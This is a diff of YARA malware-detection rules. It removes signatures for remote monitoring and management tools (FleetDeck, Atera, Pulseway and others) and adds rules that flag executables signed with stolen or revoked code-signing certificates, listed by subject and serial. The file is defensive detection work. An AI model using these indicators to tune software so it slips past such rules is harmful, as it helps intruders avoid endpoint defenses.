+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3529-L3540"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "121e59ea0088c519b618e740b57c560d60cced4a48c9d468e6bf1ab22fa8c8ff"
+		logic_hash = "9893e21fd2d5a475c9defb484921de17f4afc00619be413b9d5d55095e7f596a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckAgent"
-
-	strings:
-		$s1 = "fleetdeck.io/" ascii
-		$s2 = "load FleetDeck agent" ascii
-		$s3 = ".dev1.fleetdeck.io" ascii
-		$s4 = "remoteDesktopSessionMutex" ascii
-		$s5 = "main.remoteDesktopWatchdog" fullword ascii
-		$s6 = "main.virtualTerminalWatchdog" fullword ascii
-		$s7 = "main.meetRemoteDesktop" fullword ascii
-		$s8 = "repo.senri.se/prototype3/" ascii
-		$s9 = "main.svcIpcClient" fullword ascii
-		$s10 = "main.hookMqttLogging" fullword ascii
+		thumbprint = "06d46ee9037080c003983d76be3216b7cad528f8"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : FILE
 {
 	meta:
-		description = "Detects FleetDeck Commander. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "27d533b5-7a66-507e-8ef8-ad9a6cd39ab1"
-		date = "2023-08-22"
+		id = "be18fe1a-f810-5153-b565-97a0e33cf406"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L125-L143"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3542-L3553"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "feee888c6649af0d8e8b08a38dda0bf7970089cf064f58b8bd9c6ebd8378e094"
+		logic_hash = "c5f7f23d9ba35bed3540233217e18b84c5ac0528fd3fe809c162fce6ccce0791"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander"
-
-	strings:
-		$s1 = "Software\\Microsoft\\FleetDeck Commander" ascii
-		$s2 = "fleetdeck.io/prototype3/" ascii
-		$s3 = "fleetdeck_commander_launcher.exe" ascii
-		$s4 = "fleetdeck_commander_svc.exe" ascii
-		$s5 = "|FleetDeck Commander" ascii
-		$s6 = "c:\\agent\\_work\\66\\s\\" ascii
+		thumbprint = "84b5ef4f981020df2385754ab1296821fa2f8977"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_SVC : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_62B80Fc5E1C02072019C88Ee356152C1 : FILE
 {
 	meta:
-		description = "Detects FleetDeck Commander SVC. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c03b61b4-36d0-5d38-9af8-e78b9930231f"
-		date = "2023-08-22"
+		id = "08db7669-c3d6-5f27-988e-96e9fc0a60f3"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L145-L162"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3555-L3566"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20bd69df3d058c24f83af312671cf249a3f26f54ef2e60f6b5b48a5bdb21b68b"
+		logic_hash = "c06e31f5a071ff7c87af216d22bffa2970372fa341ad2593ef0c3c6a71dac945"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-SVC"
-
-	strings:
-		$s1 = "fleetdeckfork/execfuncargs(" ascii
-		$s2 = "REG ADD HKEY_CLASSES_ROOT\\%s /V \"URL Protocol\" /T REG_SZ /F" ascii
-		$s3 = "proceed: *.fleetdeck.io" ascii
-		$s4 = "fleetdeck.io/prototype3/commander_svc" ascii
-		$s5 = "commanderupdate.fleetdeck.io" ascii
+		thumbprint = "0a83c0f116020fc1f43558a9a08b1f8bcbb809e0"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Inversum" and pe.signatures [ i ] . serial == "62:b8:0f:c5:e1:c0:20:72:01:9c:88:ee:35:61:52:c1" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_Launcher : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_F0E150C304De35F2E9086185581F4053 : FILE
 {
 	meta:
-		description = "Detects FleetDeck Commander Launcher. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9a4a221e-7a7a-5008-b509-7f01e4a3eea6"
-		date = "2023-08-22"
+		id = "d2a5cd5b-1e4a-5714-bff2-08f2c958cd0b"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L164-L178"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3581-L3592"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9429f55f162eebc58a7a9af8706244438cb76b1f0987facbb52d29997ed48b95"
+		logic_hash = "fe3d5d57d0a98414e3e4f35248d3ebf64617c16a4119a21883c3679b06146745"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-Launcher"
-
-	strings:
-		$s1 = "fleetdeck.io/prototype3/commander_launcher" ascii
-		$s2 = "FleetDeck Commander Launcher" ascii
+		thumbprint = "c0a448b9101f48309a8e5a67c11db09da14b54bb"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rare Ideas, LLC" and pe.signatures [ i ] . serial == "f0:e1:50:c3:04:de:35:f2:e9:08:61:85:58:1f:40:53" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A1A3E7280E0A2Df12F84309649820519 : FILE
 {
 	meta:
-		description = "Detects FleetDeck agent by (default) certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "49a6b0bb-599a-54b0-85bc-b2f6849e3ae8"
-		date = "2023-08-22"
+		id = "71ad82d6-e45e-52a9-b1ff-f00cfe7b5186"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L180-L198"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3594-L3605"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8f72713eb4a5d9d32629351b937eee7de5d83abe1cd409cd8c3a8c9c52e6e490"
+		logic_hash = "5c656fa5a6671f717cda5433c8780d308f11b7937e5ff66b4f3f74623b217365"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "33d254c711937b469d1b08ef15b0a9f5b4d27250"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( ( pe.signatures [ i ] . issuer contains "Sectigo Limited" or pe.signatures [ i ] . issuer contains "COMODO CA Limited" ) and pe.signatures [ i ] . subject contains "FleetDeck Inc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nir Sofer" and pe.signatures [ i ] . serial == "a1:a3:e7:28:0e:0a:2d:f1:2f:84:30:96:49:82:05:19" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_1Fb984D5A7296Ba74445C23Ead7D20Aa : FILE
 {
 	meta:
-		description = "Detects PDQ Connect Agent. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "067e75a3-291b-500f-865d-8758eebe91e7"
-		date = "2023-08-22"
+		id = "1e290f81-11ab-5d5f-ab7a-c703c875bde4"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L200-L227"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3607-L3618"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34d0b07925551d1b08b86aa226c59aba569b6548cfa00a86ce6b1f271e427662"
+		logic_hash = "ff29013eb20bccbec16107404fc18b07c87ac5269b788c48a49a490271e94052"
 		score = 75
 		quality = 75
 		tags = "FILE"
-
-	strings:
-		$api1 = "/devices/register" ascii
-		$api2 = "/devices/socket/websocket?device_id=" ascii
-		$api3 = "/devices/tasks" ascii
-		$api4 = "/devices/auth-challenge" ascii
-		$api5 = "/devices/receiver/Url" ascii
-		$s1 = "sign_pdq.rs" ascii
-		$s2 = "x-pdq-dateCredential=(.+?)/" ascii
-		$s3 = "pdq-connect-agent" ascii
-		$s4 = "PDQ Connect Agent" ascii
-		$s5 = "PDQConnectAgent" ascii
-		$s6 = "PDQConnectAgentsrc\\logger.rs" ascii
-		$s7 = "-PDQ-Key-IdsUser-Agent" ascii
-		$s8 = "\\PDQ\\PDQConnectAgent\\" ascii
-		$s9 = "\\pdq_connect_agent.pdb" ascii
-		$s10 = "task_ids[]PDQ rover" ascii
-		$s11 = "https://app.pdq.com/" ascii
+		thumbprint = "c852fc9670391ff077eb2590639051efa42db5c9"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and ( 4 of ( $s* ) or ( 3 of ( $api* ) and 1 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DrWeb Digital LLC" and pe.signatures [ i ] . serial == "1f:b9:84:d5:a7:29:6b:a7:44:45:c2:3e:ad:7d:20:aa" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C314A8736F82C411B9F02076A6Db4771 : FILE
 {
 	meta:
-		description = "Detects PDQ Connect Agent by (default) certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7e830cf0-8f47-5b38-85cd-9777a6878cf1"
-		date = "2023-08-22"
+		id = "0a8af16c-f232-5e09-9825-0e8203ba7b45"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L229-L243"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3620-L3631"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "373a32b8bfd8c4295ba0c0302a217ccfbb7c7c616f91035097adbc5384b8afdb"
+		logic_hash = "8aa08c4d1da62d0629db6e29f7a730da3534f114620e30f8d89e5475c12f43de"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "9c49d7504551ad4ddffad206b095517a386e8a14"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "PDQ.com Corporation" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbcbaeaabbfcebfcbbeeffeadfc" and pe.signatures [ i ] . serial == "c3:14:a8:73:6f:82:c4:11:b9:f0:20:76:a6:db:47:71" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_Pcmontasksrv : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_5F7Ef778D51Cd33A5Fc0D2E035Ccd29D : FILE
 {
 	meta:
-		description = "Detects Pulseway pcmontask and service user agent responsible for Remote Control, Screens View, Computer Lock, etc"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "83901679-ffff-5710-b472-ece592e6764f"
-		date = "2023-08-22"
+		id = "95b1cba9-9625-55da-a321-08cdd4d3056f"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L245-L266"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3633-L3644"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80ba217960dd1ddeb220545c1cccbe96d9b676d327364e1ca8a9dde2b059261f"
+		logic_hash = "9b57fd9840dceea97a2f013f803e8639add6c6b01f3764b65b3c1fe60ae0dd57"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.PulseWay"
-
-	strings:
-		$s1 = "MM.Monitor." ascii
-		$s2 = "RDAgentSessionSettingsV" ascii
-		$s3 = "CheckForMacOSRemoteDesktopUpdateCompletedEvent" ascii
-		$s4 = "ConfirmAgentStarted" ascii
-		$s5 = "GetScreenshot" ascii
-		$s6 = "UnloadRemoteDesktopDlls" ascii
-		$s7 = "CtrlAltDeleteProc" ascii
-		$s8 = "$7cfc3b88-6dc4-49fc-9f0a-bf9e9113a14d" ascii
-		$s9 = "computermonitor.mmsoft.ro" ascii
+		thumbprint = "87229a298b8de0c7b8d4e23119af1e7850a073f5"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 7 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffadbcfabbe" and pe.signatures [ i ] . serial == "5f:7e:f7:78:d5:1c:d3:3a:5f:c0:d2:e0:35:cc:d2:9d" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_Remotedesktop : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ab1D5E43E4Dde77221381E21A764C082 : FILE
 {
 	meta:
-		description = "Detects Pulseway Rempte Desktop client"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8bca3cef-b24f-597a-a6e2-86040ed726f4"
-		date = "2023-08-22"
+		id = "55135b31-93d7-512f-8506-51e49bc3dc92"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L268-L286"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3646-L3657"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a542c11f21ab48f4da69df4e7cb46531658a714687e2c2f8ccf78dc2a0338b68"
+		logic_hash = "3746c3494dca7fd2e0c7ab6641fe9ebbb8519df755022a3bde99c192158e4299"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.PulseWay"
-
-	strings:
-		$s1 = "RemoteControl" ascii
-		$s2 = "MM.Monitor.RemoteDesktopClient." ascii
-		$s3 = "MM.Monitor.RemoteControl" ascii
-		$s4 = "RemoteDesktopClientUpdateInfo" ascii
-		$s5 = "ShowRemoteDesktopEnabledSystemsOnly" ascii
-		$s6 = "$31f50968-d45c-49d6-ace9-ebc790855a51" ascii
+		thumbprint = "b84a817517ed50dbae5439be54248d30bd7a3290"
+		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dadddbffbfcbdaaeeccecbbffac" and pe.signatures [ i ] . serial == "00:ab:1d:5e:43:e4:dd:e7:72:21:38:1e:21:a7:64:c0:82" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4743E140C05B33F0449023946Bd05Acb : FILE
 {
 	meta:
-		description = "Detects PulseWay by (default) certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e00f51dc-261e-5a38-89ed-1899d9b522d4"
-		date = "2023-08-22"
+		id = "f3e8046a-0df7-5a67-a363-02961ec1545b"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L288-L302"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3659-L3670"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c667caa9b7de4b166630c66e5162071948fa93c68b1cdb3038fce28e13dcb1a9"
+		logic_hash = "be8764a008743f8ca8c1a5760c5daa7f6896c8710f5f79f9d5b42b07ef0d5fa8"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		thumbprint = "7b32c8cc35b86608c522a38c4fe38ebaa57f27675504cba32e0ab6babbf5094a"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "MMSOFT Design Ltd." )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STROI RENOV SARL" and pe.signatures [ i ] . serial == "47:43:e1:40:c0:5b:33:f0:44:90:23:94:6b:d0:5a:cb" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Manageengine_Zohomeeting : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_2C1Ee9B583310B5E34A1Ee6945A34B26 : FILE
 {
 	meta:
-		description = "Detects ManageEngine Zoho Meeting (dc_rds.exe)"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b15efdd1-323c-5ed6-894d-b44f04d2eaf3"
-		date = "2023-08-22"
+		id = "0cc94ceb-a5bf-511a-bcd0-136b5d35c348"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L304-L324"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3672-L3683"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8066bcd17245efcc73f2bef7f022ad23ab648fe0ad15ca66c0d387ce4eda998b"
+		logic_hash = "4891757929b64b45591792dd2526ffb7588345f76bcbd3e47f567e72ba03d7f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.ManageEngine-ZohoMeeting"
-
-	strings:
-		$s1 = "bin\\ClientAuthHandler.dll" wide
-		$s2 = "AgentHook.dll" wide
-		$s3 = "UEMS - Remote Control" wide
-		$s4 = "Install hook...." wide
-		$s5 = "india.adventnet.com/meet.sas?k=" ascii
-		$s6 = "dcTcpSocket::" ascii
-		$s7 = "%s/%s?clientId=%s&sessionId=%s&clientName=%s&ticket=%s&connectionId=%s" ascii
-		$s8 = ".\\engines\\ccgost\\gost_" ascii
+		thumbprint = "7af96a09b6c43426369126cfffac018f11e5562cb64d32e5140cff3f138ffea4"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Artmarket" and pe.signatures [ i ] . serial == "2c:1e:e9:b5:83:31:0b:5e:34:a1:ee:69:45:a3:4b:26" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Atera : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_00D338F8A490E37E6C2Be80A0E349929Fa : FILE
 {
 	meta:
-		description = "Detects Atera. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "9801f5c9-bc1e-5502-8bca-ee1f5ca0f497"
-		date = "2023-08-22"
+		id = "5bb542de-637f-58a4-b96a-f20dba7be1b7"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L345-L366"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3685-L3696"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbc37a941b38d36ea9bc31880c3cba6cd2b88b534583e86741f7686fcb410235"
+		logic_hash = "ed7a48df55f2d7873795470b9074421f4008d715db07978c79b174fc3f2a801a"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.Atera"
-
-	strings:
-		$s1 = "SOFTWARE\\ATERA Networks\\AlphaAgent" wide
-		$s2 = "Monitoring & Management Agent by ATERA" ascii wide
-		$s3 = "agent-api-{0}.atera.com" wide
-		$s4 = "agent-api.atera.com" wide
-		$s5 = "acontrol.atera.com" wide
-		$s6 = /Agent\/(PingReply|GetCommandsFallback|GetCommands|GetTime|GetEnvironmentStatus|GetRecurringPackages|AgentStarting|AcknowledgeCommands)/ wide
-		$s7 = "\\AlphaControlAgent\\obj\\Release\\AteraAgent.pdb" ascii
-		$s8 = "AteraWebAddress" ascii
-		$s9 = "AlphaControlAgent.CloudLogsManager+<>" ascii
+		thumbprint = "480a9ce15fc76e03f096fda5af16e44e0d6a212d6f09a898f51ad5206149bbe1"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAGUARO ApS" and pe.signatures [ i ] . serial == "00:d3:38:f8:a4:90:e3:7e:6c:2b:e8:0a:0e:34:99:29:fa" )
 }
 
-rule DITEKSHEN_INDICATOR_RMM_Atera_CERT : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_778906D40695F65Ba518Db760Df44Cd3 : FILE
 {
 	meta:
-		description = "Detects Atera by certificate. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a5ccb684-1e28-51c8-a4d6-0b5abba97de0"
-		date = "2023-08-22"
+		id = "87f5a591-ed92-5ee8-99f8-04afe302609e"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L368-L383"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3698-L3709"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f51fef767cd529271f06d578146634e1ab5ee5ac3ffb829cbaa870e7c69ca3f6"
+		logic_hash = "2687ec82b9c968dca91b8f54c600fae794d01be43a31cce4b0e6ef63672870fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.Atera"
+		thumbprint = "1103debcb1e48f7dda9cec4211c0a7a9c1764252"
+		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Atera Networks Ltd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . serial == "77:89:06:d4:06:95:f6:5b:a5:18:db:76:0d:f4:4c:d3" )
 }
-rule DITEKSHEN_INDICATOR_RMM_Splashtopstreamer : FILE
+
+rule DITEKSHEN_INDICATOR_KB_CERT_45Eb9187A2505D8E6C842E6D366Ad0C8 : FILE
 {
 	meta:
-		description = "Detects Splashtop Streamer. Review RMM Inventory"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "317f2be4-983f-5528-b629-75a13de7b411"
-		date = "2023-08-22"
+		id = "75494bb2-fa70-5983-a75c-067b06c597e5"
+		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
